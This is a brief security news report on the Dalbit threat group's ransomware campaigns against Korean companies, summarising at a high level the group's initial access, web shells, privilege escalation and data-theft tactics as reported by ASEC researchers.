Dalbit Threat Group Runs Attack Campaigns Against Korean Companies
Dalbit Threat Group Runs Attack Campaigns Against Korean Companies
Researchers from the ASEC analysis team report threat group tracked as Dalbit, targeting Korean companies to launch ransomware. Since 2022, Dalbit is responsible for at least 50 attacks against various industries including technology, industrial, chemical, construction, automotive, manufacturing, education, media, and others. The majority of the companies attacked are categorized as mid to small-sized companies. Several of the tools frequently deployed by Dalbit came from the Chinese community, and like a proxy tool are assessed to have "a partial connection with China."
To obtain initial access, the attackers often target vulnerabilities dropping WebShells including Godzilla, ASPXSpy, AntSword, and China Chopper. "In particular, 30% of the affected companies were found to have been using a certain Korean groupware product." Dalbit actors are documented to have exploited WebLogic vulnerability, CVE-2017-10271. With access to the environment, Dalbit operators drop tools using certutil and Bitsadmin aiding with privilege escalation, reconnaissance, and command and control (C2) communication. Following privilege escalation with the range of Potato exploits (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato), operators disabled firewall settings and added a new account for persistence. With escalated privileges and lowered network defenses, the threat actors set up C2 communication with their proxy tool and proceed to collect credentials, emails, and other valuable data for extortion.